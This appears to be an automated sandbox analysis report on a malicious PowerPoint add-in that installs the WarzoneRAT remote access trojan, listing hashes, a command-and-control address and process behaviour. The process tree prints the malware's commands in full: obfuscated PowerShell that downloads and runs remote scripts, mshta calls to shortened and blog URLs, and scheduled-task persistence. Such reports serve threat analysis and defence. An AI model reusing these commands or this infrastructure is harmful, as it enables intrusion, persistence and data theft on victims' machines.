Analysis
-
max time kernel
146s -
max time network
154s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
12-07-2021 14:59
Static task
static1
Behavioral task
behavioral1
Sample
IdDetails.ppam
Resource
win7v20210408
Behavioral task
behavioral2
Sample
IdDetails.ppam
Resource
win10v20210410
General
-
Target
IdDetails.ppam
-
Size
16KB
-
MD5
8fb67950eee24c33116c5c8ae87bbde1
-
SHA1
26d8b5eec451ed68f3a61f4f69b4fadffb736d22
-
SHA256
a524b17edc79f1cacd57f9a07becfd24df6d0ef893d11620cb3c300c86c327ed
-
SHA512
1c03f7930d08ad4ea8d7fc0f8527d5db6bc618989e8ab9183abe05309d6b9f75f0eef61271059a576e2709a7d6ec5385f206d48ca99eeda9832148fa1117c9e3
Malware Config
Extracted
https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt
Extracted
warzonerat
normanaman.duckdns.org:3009
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exeschtasks.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1240 4064 mshta.exe POWERPNT.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4572 3288 schtasks.exe -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Blocklisted process makes network request 24 IoCs
Processes:
mshta.exepowershell.exepowershell.exeflow pid process 19 1240 mshta.exe 21 1240 mshta.exe 23 1240 mshta.exe 25 1240 mshta.exe 27 1240 mshta.exe 29 1240 mshta.exe 30 1240 mshta.exe 32 1240 mshta.exe 34 1240 mshta.exe 35 1240 mshta.exe 38 1240 mshta.exe 40 1240 mshta.exe 41 1240 mshta.exe 43 3528 powershell.exe 45 1240 mshta.exe 46 3616 powershell.exe 49 3528 powershell.exe 52 3528 powershell.exe 54 3528 powershell.exe 56 3528 powershell.exe 58 3528 powershell.exe 59 3616 powershell.exe 62 3528 powershell.exe 65 3616 powershell.exe -
Process spawned suspicious child process 1 IoCs
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
Processes:
DW20.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2408 4064 DW20.EXE POWERPNT.EXE -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 3616 set thread context of 4296 3616 powershell.exe MSBuild.exe PID 3616 set thread context of 4420 3616 powershell.exe MSBuild.exe PID 3616 set thread context of 4612 3616 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4112 1240 WerFault.exe mshta.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3484 schtasks.exe 4572 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 4064 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
POWERPNT.EXEpowershell.exepowershell.exeWerFault.exepid process 4064 POWERPNT.EXE 4064 POWERPNT.EXE 3528 powershell.exe 3528 powershell.exe 3616 powershell.exe 3528 powershell.exe 3616 powershell.exe 3616 powershell.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe 4112 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3528 powershell.exe Token: SeDebugPrivilege 3616 powershell.exe Token: SeDebugPrivilege 4112 WerFault.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
POWERPNT.EXEpid process 4064 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.exepowershell.exedescription pid process target process PID 4064 wrote to memory of 1240 4064 POWERPNT.EXE mshta.exe PID 4064 wrote to memory of 1240 4064 POWERPNT.EXE mshta.exe PID 1240 wrote to memory of 3528 1240 mshta.exe powershell.exe PID 1240 wrote to memory of 3528 1240 mshta.exe powershell.exe PID 1240 wrote to memory of 3484 1240 mshta.exe schtasks.exe PID 1240 wrote to memory of 3484 1240 mshta.exe schtasks.exe PID 1240 wrote to memory of 3616 1240 mshta.exe powershell.exe PID 1240 wrote to memory of 3616 1240 mshta.exe powershell.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4296 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3616 wrote to memory of 4420 3616 powershell.exe MSBuild.exe PID 3528 wrote to memory of 4496 3528 powershell.exe WScript.exe PID 3528 wrote to memory of 4496 3528 powershell.exe WScript.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe PID 3616 wrote to memory of 4612 3616 powershell.exe aspnet_compiler.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\IdDetails.ppam" /ou ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mshta.exemshta http://www.bitly.com/ashjdkqowdhqowdh2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\lub.vbs"4⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@backishbackuponback.blogspot.com/p/clientsced.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/1.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/2.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601403.us.archive.org/11/items/3_20210710_20210710/3.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe#cmd4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"{path}"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1240 -s 26443⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 34402⤵
- Process spawned suspicious child process
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\cc6d463293ce4e6a9a851b75e88ea577 /t 3988 /p 40641⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 80 /tn ""BatFile"" /F /tr ""\""C:\Users\Public\clone.vbs""1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ba0c69ceb0908b193521106967959098
SHA144ca77c41d4ab2c17df1c831c41900e4f692f8de
SHA25671f2c3e06e74aa830de694c5a96927e37919c322b8e2ace896a87cbf44b32f55
SHA512cf70230fe5dc40ff2b4d03dd9dedd7444f70430e35da55627ec8963244f47dce150e371b5015e508fed11b02a8e84cad240cd6d251dac2df3037ce149d03ca97
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
24c98423fe34f9dde04993e00d3863d1
SHA1866c0e8d72e8d2251adae71db874cae05d2bf721
SHA2562e264c09fbd11a8f304c5c4730dc293d7fd3c95fbca0aa545362ddfb887c56e6
SHA512eb627c291a374e7f6606b30e089cef9713676c91e0c47f4d460c33f7ec5b70749dc0a1da9a70d93eec2e14f717e7954236a70e7407cf82d0167b7c100013cf14
-
C:\Users\Public\lub.vbsMD5
1edd4ddfe49d879dd3c977804a05b9bd
SHA117157ecc88f381e568f36b9263044450e9dfccbe
SHA256d8a10361792b7d54e4084a5a9736e3c8e47e805be894b9a7965e48793f591efa
SHA5126a75daef70bb16da4f33f33fe8e7263b35e327205c2c0f0cc1e44445c8103021ff200830698013f9ad8b3179127ae45a9260b8d10a2bc147417dc378d3a6d0df
-
memory/1240-178-0x0000000000000000-mapping.dmp
-
memory/3484-188-0x0000000000000000-mapping.dmp
-
memory/3528-198-0x0000020FB00D0000-0x0000020FB00D1000-memory.dmpFilesize
4KB
-
memory/3528-218-0x0000020F97A86000-0x0000020F97A88000-memory.dmpFilesize
8KB
-
memory/3528-214-0x0000020F97A83000-0x0000020F97A85000-memory.dmpFilesize
8KB
-
memory/3528-210-0x0000020F97A80000-0x0000020F97A82000-memory.dmpFilesize
8KB
-
memory/3528-201-0x0000020FB0280000-0x0000020FB0281000-memory.dmpFilesize
4KB
-
memory/3528-187-0x0000000000000000-mapping.dmp
-
memory/3616-217-0x0000029E30733000-0x0000029E30735000-memory.dmpFilesize
8KB
-
memory/3616-219-0x0000029E30736000-0x0000029E30738000-memory.dmpFilesize
8KB
-
memory/3616-252-0x0000029E308E0000-0x0000029E308E1000-memory.dmpFilesize
4KB
-
memory/3616-239-0x0000029E48B00000-0x0000029E48B20000-memory.dmpFilesize
128KB
-
memory/3616-215-0x0000029E30730000-0x0000029E30732000-memory.dmpFilesize
8KB
-
memory/3616-230-0x0000029E308D0000-0x0000029E308D3000-memory.dmpFilesize
12KB
-
memory/3616-190-0x0000000000000000-mapping.dmp
-
memory/3616-224-0x0000029E308B0000-0x0000029E308BB000-memory.dmpFilesize
44KB
-
memory/4064-118-0x00007FFDC5330000-0x00007FFDC6F0D000-memory.dmpFilesize
27.9MB
-
memory/4064-115-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmpFilesize
64KB
-
memory/4064-114-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmpFilesize
64KB
-
memory/4064-119-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmpFilesize
64KB
-
memory/4064-122-0x00007FFDC1500000-0x00007FFDC25EE000-memory.dmpFilesize
16.9MB
-
memory/4064-117-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmpFilesize
64KB
-
memory/4064-123-0x00007FFDBD1B0000-0x00007FFDBF0A5000-memory.dmpFilesize
31.0MB
-
memory/4064-116-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmpFilesize
64KB
-
memory/4296-225-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/4296-226-0x0000000000405E28-mapping.dmp
-
memory/4296-229-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/4420-232-0x0000000000405E28-mapping.dmp
-
memory/4496-237-0x0000000000000000-mapping.dmp
-
memory/4612-246-0x0000000000405E28-mapping.dmp